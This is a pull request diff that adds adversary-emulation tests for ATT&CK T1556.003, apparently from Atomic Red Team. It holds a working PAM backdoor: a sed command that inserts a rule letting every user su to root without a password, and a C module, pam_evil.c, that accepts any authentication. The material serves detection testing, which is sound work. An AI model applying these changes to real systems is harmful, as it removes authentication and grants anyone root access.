Merge pull request #1598 from JChamblee99/T1556.003-pam

T1556.003 Pluggable Authentication Modules

atomics/T1556.003/T1556.003.yaml

@@ -0,0 +1,78 @@
+attack_technique: T1556.003
+display_name: 'Modify Authentication Process: Pluggable Authentication Modules'
+atomic_tests:
+- name: Malicious PAM rule
+  description: |
+    Inserts a rule into a PAM config and then tests it.
+    
+    Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+  supported_platforms:
+  - linux
+  input_arguments:
+    path_to_pam_conf:
+      description: PAM config file to modify.
+      type: string
+      default: /etc/pam.d/su-l
+    pam_rule:
+      description: Rule to add to the PAM config.
+      type: string
+      default: auth sufficient pam_succeed_if.so uid >= 0
+    index:
+      description: Index where the rule is inserted.
+      type: integer
+      default: 1
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+    cleanup_command: |
+      sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+- name: Malicious PAM module
+  description: |
+    Creates a PAM module, inserts a rule to use it, and then tests it.
+
+    Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+  supported_platforms:
+  - linux
+  input_arguments:
+    path_to_pam_conf:
+      description: PAM config file to modify.
+      type: string
+      default: /etc/pam.d/su-l
+    pam_rule:
+      description: Rule to add to the PAM config.
+      type: string
+      default: auth sufficient /tmp/pam_evil.so
+    index:
+      description: Index where the rule is inserted.
+      type: integer
+      default: 1
+    path_to_pam_module_source:
+      description: Path to PAM module source code.
+      type: path
+      default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+    path_to_pam_module:
+      description: Path to PAM module object
+      type: path
+      default: /tmp/pam_evil.so
+  dependencies:
+  - description: |
+      The PAM development library must be installed to build the PAM module
+    prereq_command: |
+      if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
+  - description: |
+      The PAM module must exist on disk at specified location (#{path_to_pam_module})
+    prereq_command: |
+      if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+    cleanup_command: |
+      sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

atomics/T1556.003/src/pam_evil.c

@@ -0,0 +1,9 @@
+#include <security/pam_modules.h>
+
+PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
+    return PAM_SUCCESS;
+}
+
+PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,int argc, const char **argv) {
+    return PAM_SUCCESS;
+}